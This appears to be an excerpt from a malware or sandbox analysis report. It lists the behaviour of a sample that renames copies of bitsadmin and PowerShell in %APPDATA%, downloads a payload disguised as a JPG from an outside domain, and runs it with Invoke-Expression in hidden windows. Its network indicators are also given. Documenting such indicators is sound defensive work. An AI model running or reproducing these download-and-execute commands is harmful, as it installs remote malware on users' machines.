Technical Information
- '%APPDATA%\ndvcrhx.exe' /transfer PvReBD /download https://nvcssllc.com/nalsica/02598190920/it.jpg %APPDATA%\it.jpg
- '%APPDATA%\zndvcrhx.exe' -c &{$WT=gc %APPDATA%\it.jpg| Out-String; Invoke-Expression $WT }
- %APPDATA%\zndvcrhx.exe
- %APPDATA%\ndvcrhx.exe
- 'nv###llc.com':443
- DNS ASK nv###llc.com
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %APPDATA%\znDvcRhX.exe' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\nDvcRhX.exe' (with hidden window)
- '%APPDATA%\ndvcrhx.exe' /transfer PvReBD /download https://nvcssllc.com/nalsica/02598190920/it.jpg %APPDATA%\it.jpg' (with hidden window)
- '%APPDATA%\zndvcrhx.exe' -c &{$WT=gc %APPDATA%\it.jpg| Out-String; Invoke-Expression $WT }' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %APPDATA%\znDvcRhX.exe
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\nDvcRhX.exe